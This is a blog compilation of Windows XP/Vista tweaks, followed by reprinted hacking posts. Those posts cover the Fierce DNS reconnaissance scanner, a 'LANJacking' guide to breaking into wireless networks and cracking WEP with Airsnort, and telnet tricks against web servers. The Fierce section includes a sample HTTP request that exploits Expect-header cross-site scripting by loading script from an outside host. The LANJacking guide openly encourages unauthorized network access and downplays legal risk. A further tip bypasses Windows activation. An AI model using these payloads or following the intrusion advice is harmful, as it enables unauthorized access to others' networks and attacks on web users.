RSS2.0

Change your processors name

Sunday, December 30, 2007

Go To Start and type RUN
TYPE REGEDIT
HKEY_LOCAL_MACHINE>HARDWARE>DISCRIPTION>SYSTEM>CENTRAL


Processor
On Right Hand side just right click on Processor name and string and then Click Ok

Now Modify and write what you want to write ..

Turn off system beeps

Navigate to HKEY_CURRENT_USER\Control Panel\Sound Once there, locate Beep on the list on the right.


  • Right click on it and select Modify

  • Change the value equal to no

  • Reboot your computer and the beeps will be gone!

Hide hard drives in Windows vista

Back up your registry before you start!

1. Open Regedit

. 2. Navigate to one of these strings:

HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
- this only changes the settings for the current logged in user

HKEY_LOCALMACHINE\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
- this changes the settings for all users on the machine. You may have to create the key folder "Explorer" manually.

3. In the Explorer key folder, create a new DWORD value by right-clicking Explorer, then choosing New DWORD value. Name the value"NoDrives" (without the quotes). This value defines local and network drive visibility for each logical drive on the computer . All drives will be visible as long as this value's data is set to 0.

4. Following the table below, enter the decimal number corresponding to the drive(s) you want to hide as NoDrives value data. When you right-click on NoDrives and choose Modify, make sure you select Decimal base, not Hexadecimal.

Drive Number to hide
A: 1
B: 2
C: 4
D: 8
E: 16
F: 32
G: 64
H: 128
I: 256
J: 512
K: 1024
L: 2048
M: 4096
N: 8192
O: 16384
P: 32768
Q: 65536
R: 131072
S: 262144
T: 524288
U: 1048576
V: 2097152
W: 4194304
X: 8388608
Y: 16777216
Z: 33554432
All drives 67108863

If you want to hide more than one drive, you simply add the drive amounts together for a combined total.

For example, to hide the D:/ and T:/ drives, add the decimal value for the D:/ drive to the decimal value to the T:/ drive.

8 (D) + 524288 (T) = 524296

To disable all of your visible drives, set the value to 67108863.

You must reboot your PC to see your changes.

Hidden secrets(part 1)

Doggy Sound In Acrobat Reader

You need: Acrobat Reader 4.0



Do the following :



1. Open up Acrobat Reader.
2. Choose Help, About Plug-ins, Acrobat Forms.
3. Hold down Control-Alt-Shift and click the Credits button.
4. You should hear a dog bark, the button face will change to say "woof," and the Adobe logo will turn into a dog paw.

Espionage in Excel

You need: Excel 2000 and DirectX



Do the following :



1. Open a new worksheet in Excel 2000.



2. Select File, Save as Web Page.



3. Select Publish and check the box marked Add interactivity with.



4. Save the file as spy.html. Be sure to note the folder you saved the file in.



5. Load Internet Explorer, and choose File, Open and locate spy.html. The spreadsheet should appear in the middle of the page.



6. Scroll to row 2000, column WC. Select row 2000, and move the tab key until WC is the active column in that row.



7. Hold down Shift-Crtl-Alt and click the Office logo in the upper-left corner of the dialog box.



8. Get ready to play a spy hunter-type game. Use your keyboard to move around and make things happen: The arrow keys let you drive; the space bar will let you fire; "O" lets you drop oil slicks; and "H" will turn on your headlights when it gets dark.

How to block and unblock websites

Thursday, December 27, 2007

Many times in schools, colleges & offices surfing some sites like orkut,etc are banned !

To overcome this you can unblock these or block some other websites and play pranks !


Do The Following :
For eg you want to block www.xyz.com !



* Open the folder C:\WINDOWS\system32\drivers\etc
* There you will find a file named HOSTS

* Click on the file and press SHIFT and now right click on it .
* From the right click menu select Open with .

* Now, select Notepad to open the file from the list !
* Now, in the file under the line 127.0.0.1 localhost add another line as 127.0.0.2 www.xyz.com.

* Now, File>>Save !


Now, open your web browser and try openning www.xyz.com , it will not load !


To unblock sites just do the opposite !

How to create a boot disk

How to create a boot disk

This is quite simple.
1:
Go into MY COMPUTER
2: Have a floppy disk in your drive and then RIGHT click on on the floppy drive and then click on FORMAT
3:
You will be greeted with a number of options. The one you need to select is "Create an MS-DOS start up disk".
4:
Click ok



Note: This requires up to 5 floppy disks and DOES NOT contain ANY CD-ROM drivers to boot from. A proper CD-ROM boot up disk is going to be release by Microsoft after the Windows XP public release. You can however use you old Windows Me start-up disk if you would prefer, as long as you have not upgraded to an NTFS drive.

Convert a FAT partition to NTFS

To convert a FAT partition to NTFS, perform the following steps.

Click Start, click Programs, and then click Command Prompt.

In Windows XP, click Start, and then click Run.


At the command prompt, type CONVERT [driveletter]: /FS:NTFS.

Convert.exe will attempt to convert the partition to NTFS.


NOTE: Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command. It is also recommended to verify the integrity of the backup before proceeding, as well as to run RDISK and update the emergency repair disk (ERD).


Convert.exe will attempt to convert the partition to NTFS.

Lock your folders witout use of software

Now lock your folders without the use of any additional software


Procedure :
1. Make a folder on the desktop and name it as "folder"
2. Now, open notepad and write ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} and now (Notepad Menu) File>save as.
3. In the 'save as' name it as lock.bat and click save ! (Save it on Desktop)
4. Now, again open notepad again and write ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder and now (Notepad Menu) File>save as.
5. In the 'save as' name it as key.bat and click save ! (Save it on Desktop)
6. Now, double click lock.bat to lock the folder and now if you open your folder, control panel will open up !
7. Now, double click key.bat to open the folder and now if you open your folder, you can access your data inside the folder again !
8. Lock your folder and hide the key.bat somewhere else on your hard disk !
9. Whenever you want to open your folder just paste the key.bat on desktop and open your folder using it !

Simple !

Ever wanted to maintain a diary on your PC

Ever wanted to maintain a diary on your PC ?
Now, you can do it without the use of a software !

USE NOTEPAD !

Do The Following :
1. Open Notepad
2. Type : .LOG
3. Save it with any name say 'Diary'
4. Open Diary.txt again

Wow you see today's date and time, so start writing your Diary !

Make your own icon in Windows XP

Now even personalize your ICONS with Windows XP !

To make your own ICON :

1. Start>>All Programs>>Accessories
2. Click Paint
3. In toolbar select Image
4. Click Attributes

--------------------- Note : The size of a icon is 32 x 32 pixels ! ---------------------

5. Type 32 in both Height and Width and sure that Pixels is selected under Units
6. Click OK
7. Now add your photo or design .
8. File>>Save As
9. Type name.ico
10. Click Save

Enjoy your New ICON !!!

Xp registry hacks

Friday, December 14, 2007

Editing the Windows Registry, while much more common now than in years past, is still not to be entered into lightly. You can break Windows, cause boot failure, yada, yada. I know you're gonna do it anyway; why else would you be reading this. Just be careful, OK?

These are few because, for the most part WinXP can be customized through the interlace or with third-party freeware (as above).

All of the tips below require running regedit. To do so, hit 'Start/Run' then type 'regedit' and follow the instructions.

Naturally, I take no responsibility for any damage or loss of data incurred in the remote possibility that something goes terribly wrong.

Outlook Explorer Splash
If it's important enough to you to edit the registry in order to get rid of the OE splash page, here's how. With regedit open, go to HKEY_CURRENT_USER\Identities\{long number here will vary}\Software\Microsoft\Outlook Express\5.0. left-click on 5.0 then right-click on a blank space in the pane on the right side. Choose 'New' DWORD and name it NSplash with a value of 1.

Unload DLLs
To prevent Windows from caching DLLs after the program using them has closed, follow this procedure: Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ then left-click on Explorer. Right-click (as above) and create the DWORD AlwaysUnloadDLL with a value of 1. This requires a reboot to take effect. This will allow memory to be used more efficiently.

Hack IE Title Bar
This can be an impressive bit of personalization. Use your name or moniker to brand Internet Explorer. Go to
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ and left-click on Main to change the string "Window Title" to whatever you wish.

Encode MP3s with WiMP
Install an MP3 codec (compression/decompression, required for this operation). You can download it here. Once installed, navigate to the following string in regedit:
HKEY_LOCAL_MACHINE\Software\Microsoft\MediaPlayer\Settings\ then to MP3Encoding and set the following:
"LowRate"=dword:0000dac0
"MediumRate"=dword:0001f400
"MediumHighRate"=dword:0003e800
"HighRate"=dword:0004e200
After reboot, you'll be in the MP3 business without third-party software.

Xp tricks part 2

One-Button Adjustment
To change the built-in functions for either speed or visual effects, right-click on the 'My Computer' icon, then 'Properties' and the 'Advanced' tab. Hit the 'Settings' button and choose either 'Adjust for best appearance' or 'Adjust for best performance' to flip the switch on all of the graphical enhancements.

Folder Icons
For all folders except Thumbnails, pictures may be added or different icons may be chose, either from those in SHELL32.dll (default) or from any icon collection on your hard drive. Just right-click on the folder, choose 'Properties' then the 'Customize' tab & browse away.

Clear Type Innovation
This little goody, originally developed for laptops, will enhance your experience, both on and off the Internet. Hey. don't take my word for it, go here, say 'Yes' for the little program install the tune and tweak to you heart's content. You will enjoy the results.

Change is Good and So Easy
The quickest way to change your user name and the picture that appears next to it on the Start Menu is to double-click on that picture. From the menu that appears, you can change lotsa stuff. Pick a new picture. The pictures are 48 X 48 by default, but Windows XP will resize whatever you choose. The closer to the default size (and square), the better your results will be. Scan your face. Have fun with it. You can also prevent the irritating highlighting of newly-installed programs. Leave the option 'Set up my account to use .NET Passport' alone 'cause it's a security nightmare.

Your Desktop - Your Choices
Right-click on the Desktop. select 'Properties' then the 'Desktop' tab.
Hit the 'Customize Desktop' button and select which icons you want to appear.

In order to allow items (like custom shortcuts) to be added to the Taskbar, just right-click on it, choose 'Toolbars' then 'Quick Launch.' Delete any icons you don't want, drag shortcuts from the desktop to this new area.

Folder Options
Each folder can use its own display properties, set from the 'View' drop-down menu. Thumbnails makes sense for folders that contain images, of course. To speed the loading of this option go to the Control Panel and click 'Folder Options.' Under the 'View' tab, be certain that 'Do not cache thumbnails' is not checked.

The Ultimate Appearance Tweak
Microsoft Sez: "You can connect up to 10 monitors to your Windows XP-based computer and display numerous programs or windows at one time. You can use your mouse to move items from one monitor to
another. You can open a different file on each monitor. Or several. Or you can stretch one item across several monitors; so for example, you can see more columns in a Microsoft Excel spreadsheet, or the entire layout of a Web page, without scrolling." Consider it. Monitors and PCI video cards are pretty cheap now. Windows recognizes the addition & allows easy adjustments on the 'Display Properties/Settings' menu.

Xp tricks part 1

Activate Once Forever
Windows will require re-activation if several pieces of hardware are changed at one time. It makes sense to try to spread these installations out to avoid the hassle.

But what if the WinXP OS must be re-installed on the same system? To avoid having to re-activate, keep a copy of wpa.dbl from the System32 folder with your backups. Make sure to create a fresh copy with any hardware upgrade. Upon re-installing WinXP, just copy wpa.dbl back to the System32 folder to skip activation.

Deactivate WinXP 'Spyware'
Although mentioned on the Windows Tweaks page, it's worth repeating here if you missed it. Win XP users have a new set of security issues, including a plethora of default settings that cause 'phone home' activity, automatic updates and downloads without user choice or intervention. The method for manually disabling these is here. Free software to change these settings easily is here.

WinXP Power Toys
This versatile (unsupported) collection of goodies from Microsoft includes:

Tweak UI: Provides access to system settings that are not exposed in the Windows XP default user interface, including mouse settings, Explorer settings, taskbar settings, and more.

Super-Fast User Switcher: Switch between users without having to go through the Logon screen (see Quick Tips, below, for another way).

Open Command Window Here: Adds an "Open Command Window Here" context menu option on file system folders.

Taskbar Magnifier: Magnify part of the screen from the taskbar.

Power Calculator: Graph and evaluate functions as well as perform many different types of conversions.

Image Resizer: Resize one or many image files with a right-click.

CD Slide Show Generator: View images burned to a CD as a slide show.

Virtual Desktop Manager: Manage up to four desktops from the Windows taskbar. Multi-monitors is much better.

Webcam Timershot: Lets you take pictures at specified time intervals from a Webcam connected to your computer and save them to a location that you designate.

HTML Slide Show Wizard: Helps you create an HTML slide show of your digital pictures, ready to place on your Web site.

Microsoft pulled Power Toys for WinXP to de-bug them, and re-released them on April 23, 2002. This time, these proggies are available seperately which is a good thing. Click here to see 'em.

Don't forget IE Powertoys, a cool collection of enhancements designed for IE5.x but which work beautifully with IE6.x. Find it on the Internet page. Useful, fun and the price is right.

Hide Recycle Bin
Yes, there's a registry or 'inf' file hack for this, but why? Download TweakUI, above, change the Recycle Bin to a folder (so you can move it off the Desktop, like into My Documents), eliminate the icon and revel in your pristine desktop, without an icon to be seen (if you choose). Hey, your wallpaper looks great!

Remove 'Shortcut to' prefix and arrow
See TweakUI, above. Don't hack the registry unnecessarily.

Dig into the system
While there is a code that can be entered at a command-line prompt (ipconfig) which will display or allow configuration of ip information, but a sweeter solution is the GUI goodness of the familiar winipcfg from Win 9.X/Me. Download it from Microsoft here, install it, then just hit, Start/Run, type winipcfg and hit 'Enter.' You're so clever.

To access information on your entire system, including hardware, installed software application info and more, hit Start/Run and type winmsd. To access more information as well as change default startup items (harmlessly), try Start/Run msconfig.

Task Manager in WinXP is a versatile tool which displays running applications and processes (ala Ctrl/Alt/Del in Win 9.x/Me) as well as graphical display of Performance items like CPU, Page File Usage and Networking information. Right-click on the Taskbar and select 'Task Manager (keyboard shortcut Ctrl/Shift/Esc), Try it & see.

To configure virtually any aspect of WinXP hardware, software and behavior, hit Start/Run, type gpedit.msc and hit 'Enter' to access the Group Policy Editor. This is where you can turn off 'Autoplay' for CD-ROMs if you wish. Have fun in there.

Those Nasty Balloon Tips
These things are like the neighbor's wind chimes; an annoyance foisted upon us against our will that only gets more irritating with time. The quick, easy method of disposal is with 'Group Policy Editor, above. No third-party software or registry hacking is necessary. Choose' Disable Balloon Tips' and breathe a sigh of relief. Too bad there's no 'Delete' button for annoying neighbors.

WinXP Quick Tips
There are several methods (some involve risky and unnecessary registry hacks) for removing the persistent and annoying MSN Messenger. Hit 'Start/Run' then copy and paste the following: 'RunDll32 advpack.dll,LaunchINFSection %windir%\INF\msmsgs.inf,BLC.Remove' (without the quotes). Hit enter and it's gone.

To enable sending items wherever you wish on your computer easily, enable hidden and systems folders in the 'View' folder settings, open
C:\Documents and Settings\your_user_name\SendTo\ and add shortcuts to whatever locations you wish.

Instantly switch between users by depressing the Win key and 'Q' simultaneously. After a moment, all users appear. Keep hitting 'Q' to rotate between them.

You will use far less memory if you keep multiple applications minimized rather than in open windows.

To create a keyboard shortcut from a desktop shortcut, right-click on the shortcut, choose properties and enter the combination in the Shortcut Key box, including two of the following: CTRL, ALT, and/or SHIFT. OK out and it's done.

To eliminate the annoying question "Are you sure?" when you delete an item, right-click on the Recycle Bin icon, choose 'Properties' and remove the (default) checkmark from 'Display delete confirmation dialog.'

Prefetch works great to speed up operations in WinXP, but the default folder needs a cleanout every few weeks or the clutter will actually slow the system. Open the 'Prefetch' folder in C:\WINDOWS, left-click 'Edit,' choose 'Select All,' right click on any item in the folder and choose 'Delete' to dump everything.

Unless you spend most computer time doing searches, this tweak will add a little speed to your system. Open my computer, right-click on C:\ and select 'Properties.' Uncheck 'Allow indexing service to index this disk for faster searches.' uncheck this OK out. Select 'Apply to all folders and subfolders' in the pop-up window.

To prevent the operating system from asking for the WinXP disk during installations, copy the I386 folder from the XP CD and paste in into the C:\ drive. That'll stop it.

What? You actually used the Briefcase in Win9.x/Me? OK, to get it back on the desktop in XP, go to C:\WINDOWS\system32\dllcache and double click on 'syncapp' to place it on your desktop.

If you've removed the Recycle Bin from the Desktop (see Registry Hacks, below), you can access it by either from a 'Desktop' Toolbar added by right-clicking on the Taskbar and choosing 'Toolbars' and putting a checkmark by that setting or by opening 'My Documents' & going up one level.

If you don't want XP to display the programs in the Start Menu that it determines are used most frequently, right-click in the empty space on the left side of the menu, choose 'Properties' then 'Start Menu' and Customize. Click on 'Clear List' and set number to zero.

Right–click My Computer, and then click 'Properties' then 'Advanced.' From here you can choose for what functions the greater portion of processing and power is used and set virtual memory if you're so inclined.

To place the programs you want permanently on the Start Menu, right-click on the program from the pop-up menu and choose 'Pin to Start Menu.'

For a quick desktop shortcut to any folder, file or application, find the target on your hard drive, right-click and choose 'Send to Desktop.'

New Tips for June, 2002
Shutting down WinXP is a three-click process, but it's easy to make it a single-click process, either from a desktop or Taskbar Icon. Right-click on the Desktop, choose 'New' then 'Shortcut. A window will pop up with a dialog box for the shortcut path. Type this exactly: C:\windows\system32\shutdown.exe -s -t 00 keeping in mind that the last character is a zero, not a capital O (to make a similar shortcut for restart, substitute /r for /s). Choose 'Next' and type in a name for your new shortcut. Right-click on your new shortcut, choose 'Properties' then 'Change Icon' to make it attractive. Leave it on your desktop or drag it to your taskbar.

If you haven't already found it, making the text background that appears beneath desktop icons transparent is a snap. Go to the Control Panel, choose 'System' then 'Advanced'. Click on the 'Performance' tab then 'Settings' and put a check in the 'Use Drop Shadows' box. Voila!

To keep those ugly lines from forming beneath the text on your desktop icons, go to the Control panel and choose 'Folder Options' to be certain that 'Underline icon titles consistent with my browser' is checked. Open 'Internet Options' then the 'Advanced' tab. Under 'Browsing' look for 'Underline Links' and choose 'Never.' Now, doesn't that look better?

Now that the 'official' release of WinXP has passed the six-month mark, some of you may be experiencing some performance degradation, the source of which can't be traced. Before resorting the the sure-fire re-format and re-install, try this simple procedure. Create a new user name (with Administrator rights). See if this 'New User' experiences better performance. If so, switch to your original user name, transfer settings and accounts to the 'New User' and enjoy the improved performance. Once you're satisfied that all settings and accounts have transferred properly, eliminate your old user name and run RegCleaner to eliminate outdated settings.

Boot Disk Returns
Unlike Win2000 or WinMe, WinXP can and will produce a boot disk. Stuff a floppy into the drive, open 'My Computer' then '3 1/2" Floppy Drive,' right click and choose 'Format'. From the drop-down menu, choose 'Create Startup Disk.'

Microsoft Sez:
"Customer research shows a frequently requested feature that users want from their PCs is fast system startup, whether from cold boot or when resuming from standby or hibernation." If you're not booting in less than 30 seconds, go here & get the MSoft tool that will speed up boot times with varying but (to my knowledge) never negative results

Save Streaming Media
It's cool to listen to MP3s (or watch movies) over the Internet. Often, saving this media, however, seems impossible. Hey, if it plays on your computer, it's on your hard drive. Once the file is fully loaded and with folder view set to show hidden and systems folders, search for the media (.mp3 or .mpg). There it is!

IE 6 Stuff
New security features in IE 6.x are cool, but if you'd rather not have the web pages you've viewed to be stored on your computer, you have to choose the option manually. From the 'Tools' menu, select 'Internet Options,' then 'Advanced.' Under 'Security,' check 'Empty Temporary internet files folder when browser is closed.'

If you prefer Google (as most do) as the search engine of choice, put the page on your hard drive ('File/Save As' from IE 6.x), then open the saved with the browser and from 'Tools/Internet Options/General,' choose 'Use Current' to have IE load instantly and already Googlized

Fierce domain scan

Fierce domain scan was born out of personal frustration after performing a web application security audit. It is traditionally very difficult to discover large swaths of a corporate network that is non-contiguous. It's terribly easy to run a scanner against an IP range, but if the IP ranges are nowhere near one another you can miss huge chunks of networks.

First what Fierce is not. Fierce is not an IP scanner, it is not a DDoS tool, it is not designed to scan the whole internet or perform any un-targeted attacks. It is meant specifically to locate likely targets both inside and outside a corporate network. Only those targets are listed (unless the -nopattern switch is used). No exploitation is performed (unless you do something intentionally malicious with the -connect switch). Fierce is a reconnaissance tool. Fierce is a PERL script that quickly scans domains (usually in just a few minutes, assuming no network lag) using several tactics.

First it queries your DNS for the DNS servers of the target. It then switches to using the target's DNS server (you can use a different one if you want using the -dnsserver switch but this can cause problems if the server you use won't tell you information about other people's sites and of course you won't find much relevant internal address space). Fierce then attempts to dump the SOA records for the domain in the very slim hope that the DNS server that your target uses may be misconfigured. Once that fails (because it almost always will) it attempts to "guess" names that are common amongst a lot of different companies. Don't ask me where I got the list, it's just a list of names that id and I have seen all over the place. I thought about adding a dictionary to this, but I think that would take a lot longer, and given that very few of the words are dictionary words I don't think this would add a lot of value.

Next, if it finds anything on any IP address it will scan up and down a set amount (default 5 but you can expand it with -traverse or increase it to the entire subnet with -wide) looking for anything else with the same domain name in it using reverse lookups. If it finds anything on any of those it will recursively scan until it doesn't find any more. In this way it ends up looping a lot, and the bigger the domain is the more you get back. The reason Fierce automatically switches to using the target's DNS server is so that it can probe the Intranet (RFC1918) of the target, assuming the target uses a single DNS server for both their Intranet and external sites.

I also added a random call to something that should fail to test for wildcard DNS. If it's found, the wildcard is discarded to reduce erroneous results. That doesn't speed up the scan because it still needs to check to see if the test resolves back to IP address that the wildcard is pointing to. However it does reduce false positives.

Also, I've added a "search" option that allows you to find other non-related domain names. For example, let's say my target's domain is widget.com but I know they have email addresses like soandso@widgetcompany.com and own another company called nutsandbolts.com I can add search queries. This won't scan for those domains, but if those names pop up, it won't ignore them. Fierce will report on anything inside the search pattern as long as it matches. If you want everything I guess you could put a,b,c,...,x,y,z but I'll probably make something in the future to allow for scanning/reporting the entire C block once anything is found in it that matches the DNS string. Here's the syntax:

perl fierce.pl -dns widget.com -search widgetcompany,nutsandbolts

I also realized it can be a little bad about finding everything in a class C if the target used non-contiguous blocks within the class C. To deal with that I built in a function to allow a scan (of only C blocks). This is also really useful for scanning intranets if the DNS is poorly configured. I might expand on this later.

perl fierce.pl -range 10.10.10.0-255 -dnsserver ns1.example.com

As an alternative, you can use the -wide switch which does a wide path of reverse lookups after finding any C names that match your query in the C block. This provides a lot more information but is a lot more noisy.

perl fierce.pl -dns example.com -wide -file output.txt

Finally, for the web application security folks I added a command to connect to any http servers on port 80 and perform whatever action you put into a configuration file. This is really noisy and really slow (especially on large networks), so I wouldn't recommend trying it unless you have a few hours with nothing better to do, unless you know there are only a handful of machines or have already ran this without the connect scan turned on.

perl fierce.pl -dns example.com -connect headers.txt -fulloutput -file output.txt

Here's what a sample header file might look like. The sample file below is attempting to exploit the Expect cross site scripting vulnerability:

GET / HTTP/1.0
User-Agent: Mozilla/5.0
Host:
Expect: This is remote text via xss.js located at ha.ckers.org HstCla209156=1233232127602; HstCnv209156=1; HstC1p209156=1233231552571; HstCup209156=2; c_ppu_209156=2; c_old_pagid_209156=0

Fierce also has wordlist support so that you can supply your own dictionary using the -wordlist keyword. Since the brute force does rely on matching at least a few internal targets, this could be helpful if you know that the naming convention has to do with a certain non-obvious naming convention or uses another language, etc.

perl fierce.pl -dns example.com -wordlist dictionary.txt -file output.txt

Not convinced? Prior to running the scan I had never been to either mail.ru or rambler.ru (a few of the top Alexa sites in Russia). Since I don't read Russian, performing an audit against them is far more difficult. Here's some sample output from the two. In the first example you can see that mail.ru has a non-contiguous address for it's mobile.mail.ru than it does for the rest of the site. That would have been very difficult to locate with any other scanner. In the rambler.ru example you can see the RFC1918 space 10.* pop up:


mail.ru - 418 entries and 303 hostnames found.
rambler.ru - 472 entries and 458 hostnames found.

Trust me, we've found far more interesting sites than these two in our tests, but I don't want to disparage any companies for their mistakes. I'm sure you can think of a few companies to test this against. The results can be pretty amazing. If you don't get many results, that could be one of three things, 1) you aren't scanning their corporate domain, you are only scanning their external domain which they only have one or two machines on 2) it's a very small company or 3) you typo'd the domain name (I haven't built any checks to make sure the domain you entered is valid).

Requirements: This is a PERL program requiring the PERL interpreter with the modules Net::DNS and Net::hostent. You can install modules using CPAN:


perl -MCPAN -e 'install Net::DNS'
perl -MCPAN -e 'install Net::hostent'

Windows users: You can use Fierce under Windows if you use Cygwin with PERL and the above two modules installed. I have not tested this using ActivePerl in Windows, so I would recommend Cygwin until ActivePerl can be thoroughly tested. I am/was working on a win32 version of Fierce, but have put the project on hold. If anyone is interested in picking up where I left off, drop me a line.

Version: Fierce is currently at version 0.9.9 - Beta 03/24/2007

Download: fierce.pl

Download: hosts.txt

(Thanks to Robert E Lee for the help with this and to Michael Thumann's DNSDigger wordlist).

Getting started: perl fierce.pl -help

This may some bugs in it. Also this can be a noisy scanner, but in the tests I've performed it's exceptionally effective at finding non-contiguous IP blocks and new attack points. This should be considered a pre-cursor to nmap, unicornscan or nessus as it gives you enough information to begin a much more thorough scan with one of those other tools. Also, it can point out DNS entries for hosts that are no longer up or have not yet been put into production. Please use Fierce with care and at your own risk.

LANJacking: the New Hacker Mecca

Thursday, December 13, 2007

Getting free Internet access through IEEE standard 802.11b wireless Ethernet LANs (often called Wi-Fi LANs or WLANs) is the newest and biggest ever hacker scene. In many areas you can get free access legally through Wi-Fi systems run by volunteers. Elsewhere, it’s the wild west all over again, with spammers, computer criminals, and mostly harmless hackers running wild on WLANs whose owners have no concept of what they are hosting.

First we will cover the easy stuff: how to break into a WLAN that doesn’t authenticate users (LANJacking). These are fairly common. To do this, get a laptop with a wireless NIC (WNIC). Configure your NIC to automatically set up its IP address, gateway and DNS servers. Then, use the software that came with your NIC to automatically detect and get you online.

For example, with an Orinoco NIC, in Client Manager set the SSID (service set identifier required to be able to exchange packets on that WLAN) to be "any" or "null." Then from the Advanced menu select Site Manager. That should show you all available Wi-Fi access points.

Once you are set up to detect WLANs, then for happiest hunting, start driving (wardriving) or walking (stumbling) around an area with businesses or apartment buildings. Susan Updike points out, "Don’t forget airports – many VIP lounges, etc. have wireless hubs accessible from inside the airport or even in the parking lots."

How do you know when you’ve gotten online? One way is to run an intrusion detection system that alerts you when you get any kind of network traffic.

An easier and faster way to find those access points and choose the one you want to use is to run Network Stumbler, at http://www.netstumbler.com. It shows you all Wi-Fi access points within range of you. Network Stumbler runs on Windows desktop and laptop machines, and Mini Stumbler runs on Wi-Fi-enabled PDAs. Netstumbler-like software is available for MacOSX with either an internal AirPort card or any PCMCIA Wi-Fi card at http://www.mxinternet.net/~markw/.

For NetBSD,OpenBSD,and FreeBSD you can get BSD-Airtools at http://www.dachb0den.com/projects/bsd-airtools.html.

If you want to locate vulnerable WLANs in wholesale lots, there is an even more interesting tool. At http://www.kismetwireless.net/ you can download Kismet, a WLAN sniffer that also separates and identifies many wireless networks in the area you are testing. A version of Kismet for is available for Linux. Kismet also supports FreeBSD, OpenBSD and MacOSX.

Following are examples from a wardriving session by William Marchand of UnixHQ (http://www.unixhq.org) using a Windows 2000 Professional laptop and Netstumbler.




Figure 1: Not connected yet.

However, he fires up Netstumbler and lo and behold, he sees Fig. 2.

LANJacking: the New Hacker Mecca

Figure 2: Bill is within range of a Wi-Fi access point on Channel 6. Details are in the right hand panel.






Figure 3: It looks like a strong signal.




Figure 4: Time to get online!




Figure 5: The deed is done.

If you want to locate vulnerable WLANs in wholesale lots, there is an even more interesting tool. At http://www.kismetwireless.net/ you can download Kismet, a WLAN sniffer that also separates and identifies many wireless networks in the area you are testing. A version of Kismet for Linux, Kismet also supports FreeBSD, OpenBSD and MacOSX in on the Überhacker CD-rom.


Kismet works with any 802.11b wireless card that is capable of reporting raw packets (rfmonsupport). These include any Prism2 based card (Linksys, D-Link, Rangelan, etc), Cisco Aironet cards, and Orinoco based cards. Kismet also supports the WSP100 802.11b remote sensor by Network Chemistry and is able to monitor 802.11a networks with cards using the Ar5k chipset. Here’s where it gets interesting. There is a version that allows you to deploy many Kismet sensors for distributed sniffing. Each "drone" sensor sends packets over a TCP connection to a Kismet server. Its output can be piped into Snort (http://www.snort.org) and some other Intrusion Detection Systems (IDS).

You can get an idea of where easy-access Wi-Fi access points exist in abundance at http://www.WiFiMaps.com/ and http://www.wigle.net/maps. If you hunt on foot, keep an eye out for chalk marks on sidewalks or walls. These often denote Wi-Fi access points.

If you would rather hunt while sitting in your hacker lab, you can get into WLANs that are tens of kilometers away by using a directional antenna. http://www.fab-corp.com/ is an example of a place where you can buy these.

There are many commercial products for detecting WLANs. They are often used in companies that have problems with employees setting up unauthorized access points. For example, AirMagnet (http://www.airmagnet.com/) can run on the iPAQ PDA, and detects problems such as a Wi-Fi access point advertising its SSID.

It is legal to detect WLANs, but not to use some of the wireless systems you may access. It is best to make sure a WLAN is open to the public before using it. However, unless it requires some sort of authentication to log on, law enforcement won’t waste time pursuing casual visitors to WLANs. If you do this and get busted anyhow, well, that’s the risk you take in any unauthorized computer access.

Now we come to the slightly hard part. How do you break in if the WLAN asks for some sort of authentication? Wired Equivalent Privacy (WEP) is a common way to authenticate, and can be broken in minutes if you have a computer with a reasonably fast CPU. Since some Wi-Fi hardware is incompatible with better ways than WEP to authenticate, chances are you can find a lot of WEP nets floating around.

Airsnort is an example of a program that cracks WEP keys. Once it has captured enough packets it can usually crack WEP in a second or so, if running on Linux with a reasonably fast CPU. Airsnort has varieties that run on BSD, Linux, OS X and Windows, and can be downloaded at http://airsnort.shmoo.com/.

Now we come to the super hard part: WiFi Protected Access (WPA). It’s the latest, greatest way to keep intruders from abusing Wi-Fi. It can work, for example, with Windows Remote Authentication Dial-In Services to authenticate users – and keep the uninvited out. At this writing no technique has been publicized to break it. However, if by the time you read this, a way has been discovered, here are some web sites that are likely to offer downloads of the tools that do it, and instructions for their use.

http://www.worldwidewardrive.org/

http://www.wardriving.com/

http://www.churchofwifi.com

http://www.nakedwireless.ca/

https://mailsrv.dis.org/mailman/listinfo/wardriving

This Guide has been excerpted from the upcoming Second Edition of Überhacker! How to Break into Computers, by Carolyn Meinel. You are welcome to post this Guide to your web site or forward it to other people. Happy hacking!

How to Fake out Web Servers

Did you know that most web browsers dutifully identify themselves to every web site you visit? There's often a good reason for this. Some web sites will send you pages customized to give you better viewing with the type of browser you use. Some sites use your header information to choose what language to display. Some intrusion detection techniques even look at headers to get an idea whether a connection to a website is being made by a legitimate browser or by a clumsily programmed attack

If it bugs you to tell web sites everything your browser wants to tell them, here's how to fake them out.

Telnet! Yes, my favorite all purpose mostly harmless hacking technique is telnet. If you use Windows and have never used telnet, type Start --> Run --> type telnet in the window and hit enter. This will give you a black window with something like this in it:

Welcome to Microsoft Telnet Client.

Escape character is 'CTRL+]'

Microsoft Telnet>

Now here's a fun thing to do. At the telnet prompt, type "open happyhacker.org 80" . Now wait a few seconds and then hold down the Ctrl key and the c key with one hand and hit enter with the other.

This will give you something like:

HTTP/1.0 408 Request Timeout
Server: thttpd/2.20c 21nov01 on a Brickserver 2
Content-type: text/html
Date: Wed, 31 Jan 2007 13:23:03 GMT
Last-modified: Wed, 31 Jan 2007 13:23:03 GMT
Accept-Ranges: bytes
Connection: close

408 Request Timeout


No request appeared within a reasonable time period.



thttpd/2.20c 21nov01 on a Brickserver 2


Connection to host lost.

Now to get something better, instead you can type Start --> Run and type in "cmd". This gives an MSDOS windows and it looks something like this:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Carolyn Meinel>

From here we can do something much more fun to unsuspecting webservers. Open Notepad and type this in two lines:

telnet happyhacker.org 80
GET /gtmhh/index.shtml

It won't work unless you have this in two lines! Next copy these two lines and at the MSDOS window prompt right click, choose paste, and then hit enter. This will display all the code that the webserver would normally send your browser.

OK, so why is this a big deal? You can get the same code just by using the "page source" command on your browser. However, you got this code without having to send the browser any extra headers. All you sent was the most basic web browser command, the "GET" command.

Even more important...!!!

